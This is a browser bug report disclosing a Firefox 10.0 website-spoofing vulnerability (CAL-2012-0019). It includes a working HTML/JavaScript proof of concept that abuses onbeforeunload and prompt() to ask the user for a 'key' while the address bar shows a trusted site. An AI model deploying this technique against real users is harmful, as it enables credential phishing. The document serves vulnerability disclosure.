[CAL-2012-0019]Firefox website spoof vulnerability by hook event
Created attachment 595702
screen.gif

User Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Build ID: 20120129021758

Steps to reproduce:

[CAL-2012-0019]Firefox website spoof vulnerability by hook event


1 Affected Products
=================
tested Firefox 10.0(last)


2 Vulnerability Details
=====================
Code Audit Labs of Vulnhunt.com(http://www.vulnhunt.com) ha discovered a website spoof vulnerability in firefox which may Trick victim trust attack content a truested websit content like google in example.


3 POC:
====
open a html with following content
===================================
<h1 id="msg">type www.google.com in address bar for CAL-2012-0019 by Code Audit Labs of Vulnhunt.com</h1>
<h1 id="spoof"><input id="log"></h1>
<script type="text/javascript">
spoof.style.display = 'none';
var done = 0;
var got = 0;
onbeforeunload = function(ev) {
done = 1;
alert('Move your mouse now \nclick "Leave Page" with keyboard')
return false;
}
onmousemove = function() {
stop();
//console.log(done)
if (done && !got) {
msg.style.display = 'none';
got = prompt('enter your key?');
if (got) {
spoof.style.display = 'block';
log.value = got;
}
}
}
</script>
===================================


4 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt





Actual results:

spoof


Expected results:

not spoof
